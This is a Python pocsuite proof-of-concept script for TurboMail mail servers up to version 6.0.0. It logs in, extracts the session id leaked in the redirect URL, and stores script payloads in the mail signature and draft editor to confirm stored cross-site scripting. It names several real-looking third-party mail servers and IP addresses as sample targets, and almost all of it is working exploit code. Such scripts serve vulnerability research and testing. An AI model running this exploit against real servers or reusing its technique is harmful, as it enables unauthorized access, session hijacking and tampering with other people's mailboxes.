#!/usr/bin/env python
# coding: utf-8
import re
import random
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
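class TestPOC(POCBase):
    """pocsuite PoC for TurboMail <= 6.0.0: session id passed via GET plus two stored-XSS sinks.

    ``_verify`` logs in with the ``--email`` / ``--password`` extra parameters,
    extracts the session id from the login redirect and then runs the check
    selected by ``--verify-code``:

    * ``auth-flaw`` - report the redirect URL, which carries the session id in
      the query string / path (so it leaks through Referer headers, proxy and
      server logs, browser history).
    * ``xss1``      - store a script marker in the mail signature and check
      whether ``type=getSignature`` echoes it back unescaped.
    * ``xss2``      - save a draft whose HTML body carries the marker and check
      whether ``type=getMessageForEditor`` echoes it back unescaped.

    Both XSS checks are intrusive: they write to the target mailbox (signature
    / draft) and nothing is cleaned up afterwards. The reported ``URL`` of every
    check contains a live session id for the supplied account; treat the
    output as sensitive.
    """
    vulID = '1709'  # vul ID
    version = '1'
    author = ['lixin']
    vulDate = '2014-05-15'
    createDate = '2015-02-27'
    updateDate = '2015-02-27'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-060786']
    name = 'TurboMail <=6.0.0 /mailmain 跨站脚本漏洞 POC'
    appPowerLink = 'www.turbomail.org'
    appName = 'TurboMail'
    appVersion = '<=6.0.0'
    vulType = 'Cross Site Scripting'
    desc = '''
TurboMail邮件系统是广州拓波软件科技有限公司面向企事业单位通信需求而研发
的电子邮件服务器系统,本次漏洞中,认证缺陷是由于系统使用get方式传递sessionid
值,造成sessionid值易泄漏。另外邮件签名档和邮件编辑器处还存在存储形xss漏洞。
'''
    # the sample sites for examine
    samples = ['http://www.turbomail.org:8888/',
               'http://smtp.wunding.com/',
               'http://220.178.102.4:8081',
               'http://www.yd3.com.cn:8080/',
               'http://mail.pyppipe.com:8080',
               'http://mail.baik.com.cn/',
               'http://211.103.235.165/']

    # Seconds to wait on every request; the original only bounded the login
    # and let the follow-up requests hang indefinitely.
    _TIMEOUT = 10

    def _attack(self):
        """Attack mode has no extra effect; it runs the same checks as verify."""
        return self._verify()

    def _verify(self):
        """Log in, pick the check named by ``--verify-code`` and run it.

        Usage (extra parameters on the pocsuite command line):
          auth-flaw : pocsuite verify poc.py --verify-code=auth-flaw --email=user@domain --password=... url
          xss1      : pocsuite verify poc.py --verify-code=xss1 --email=user@domain --password=... url
          xss2      : pocsuite verify poc.py --verify-code=xss2 --email=user@domain --password=... url

        Returns the ``Output`` built by ``parse_verify``; an empty result
        (missing credentials, failed login, unknown verify code, marker not
        reflected) is reported as a failure.
        """
        result = {}
        params = self.params
        if not (hasattr(params, 'email') and hasattr(params, 'password')):
            return self.parse_verify(result)

        uid = params.email.partition('@')[0]
        location, sessionid = self._login(params.email, params.password)
        if not sessionid:
            return self.parse_verify(result)

        # getattr: the original dereferenced params.verify_code unconditionally
        # and crashed with AttributeError when the flag was omitted.
        verify_code = getattr(params, 'verify_code', None)
        if verify_code == 'auth-flaw':
            # The redirect target itself is the finding: it carries the session
            # id in the URL. Note the reported URL is a live session token.
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = location
            return self.parse_verify(result)

        marker, payload = self._make_marker()
        # NOTE(review): kept from the original - the cookie *name* is the
        # session id itself. ``{'sessionid': sessionid}`` looks more plausible,
        # but the real cookie name is not visible here; confirm on a live target.
        cookie = {sessionid: sessionid}

        url = None
        if verify_code == 'xss1':
            url = self._check_signature_xss(sessionid, cookie, marker, payload)
        elif verify_code == 'xss2':
            url = self._check_editor_xss(sessionid, cookie, uid, marker, payload)
        if url:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
        return self.parse_verify(result)

    def _login(self, email, password):
        """POST the credentials to ``/mailmain?type=login`` and parse the redirect.

        Returns ``(location, sessionid)``. Both are ``None`` when the server did
        not redirect (bad credentials, unexpected version); ``sessionid`` alone
        is ``None`` when the redirect carries no recognisable id.
        """
        uid, _, domain = email.partition('@')
        post_data = {'uid': uid, 'domain': domain, 'pwd': password}
        response = req.post(self.url + '/mailmain?type=login', data=post_data,
                            timeout=self._TIMEOUT, allow_redirects=False)
        # .get(): a failed login may come back without a Location header,
        # which the original turned into a KeyError.
        location = response.headers.get('location')
        if not location:
            return None, None

        sessionid = None
        # Two redirect shapes are handled: ``...sessionid=<id>_0...`` and
        # ``.../tmw/<id>_0/next...``. As in the original, the path form wins
        # when both are present.
        if location.find('sessionid=') > -1:
            match = re.search('(?<=sessionid=).*?(?<=_0)', location)
            if match:
                sessionid = match.group()
        if location.find('_0/next') > -1:
            match = re.search('(?<=tmw/).*?(?=/next)', location)
            if match:
                sessionid = match.group()
        return location, sessionid

    @staticmethod
    def _make_marker():
        """Return a per-run 7-digit marker and the script payload built from it."""
        marker = ''.join(random.sample("12347890", 7))
        # The original payload closed with ``</sciript>`` (typo); fixed.
        payload = '<script>alert(' + marker + ');</script>'
        return marker, payload

    @staticmethod
    def _body_text(response):
        """Return the response body as text (works for both str and bytes bodies)."""
        body = response.content
        if isinstance(body, bytes):
            body = body.decode('utf-8', 'replace')
        return body

    @classmethod
    def _reflected(cls, response, marker):
        """True when our unescaped script tag with this run's marker is in the body.

        Matching ``<script>alert(<marker>)`` rather than any ``<script>`` avoids
        false positives from the application's own inline scripts; matching the
        marker alone is not enough either, since an escaped
        ``&lt;script&gt;alert(<marker>)`` still contains it.
        """
        return ('<script>alert(' + marker + ')') in cls._body_text(response)

    def _check_signature_xss(self, sessionid, cookie, marker, payload):
        """Store the payload as the mail signature and read it back.

        Returns the ``getSignature`` URL when the payload is reflected
        unescaped, else ``None``. Leaves the signature modified.
        """
        base = (self.url + '/tmw/' + sessionid + '/mailmain?sessionid=' + sessionid
                + '&intertype=ajax')
        post_data = {'signTitle': marker, 'signContent': payload,
                     'type': 'onlysign', 'subtype': 'ret_json'}
        # The original POSTed to ``/mainlmain`` (typo) and sent no body at
        # all, so the signature was never actually written and the check could
        # only succeed by accident.
        req.post(base, data=post_data, cookies=cookie, timeout=self._TIMEOUT)
        url = base + '&type=getSignature'
        response = req.get(url, cookies=cookie, timeout=self._TIMEOUT)
        if self._reflected(response, marker):
            return url
        return None

    def _check_editor_xss(self, sessionid, cookie, uid, marker, payload):
        """Save a draft with the payload in ``htmlbody`` and load it in the editor.

        Returns the ``getMessageForEditor`` URL when the payload is reflected
        unescaped, else ``None`` (including when the save response carries no
        ``msgid``). Leaves the draft in the mailbox.
        """
        post_data = {'smsgid': marker, 'mbtype': 'draft', 'request': 'Send', 'cb1': 'html',
                     'supportflash': 'true', 'uploadall': 'true', 'netdisk_num': '0', 'to': uid,
                     'subject': marker, 'htmlbody': payload, 'savesend': 'true', 'priority': '3',
                     'charset': 'UTF-8', 'type': 'savedraft',
                     'sessionid': sessionid, 'intertype': 'ajax'}
        response = req.post(self.url + '/tmw/' + sessionid + '/mailmain', data=post_data,
                            cookies=cookie, timeout=self._TIMEOUT)
        match = re.search('(?<=msgid":").*?(?=")', self._body_text(response))
        if not match:
            return None
        # msgid is server-supplied and spliced into the URL unmodified, as in
        # the original; it is only ever sent back to the same host.
        msgid = match.group()
        url = (self.url + '/tmw/' + sessionid + '/mailmain?type=getMessageForEditor&subty'
               'pe=composedraft&mbtype=draft&msgid=' + msgid + '&formatreturn=false&mbid'
               '=0&sessionid=' + sessionid + '&intertype=ajax')
        response = req.get(url, cookies=cookie, timeout=self._TIMEOUT)
        if self._reflected(response, marker):
            return url
        return None

    def parse_verify(self, result):
        """Wrap ``result`` in an ``Output``: success when non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

    def parse_attack(self, result):
        """Same reporting as ``parse_verify`` (attack mode runs the verify checks)."""
        return self.parse_verify(result)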
# Hand the PoC class to the pocsuite loader so `pocsuite verify/attack` can find it.
register(TestPOC)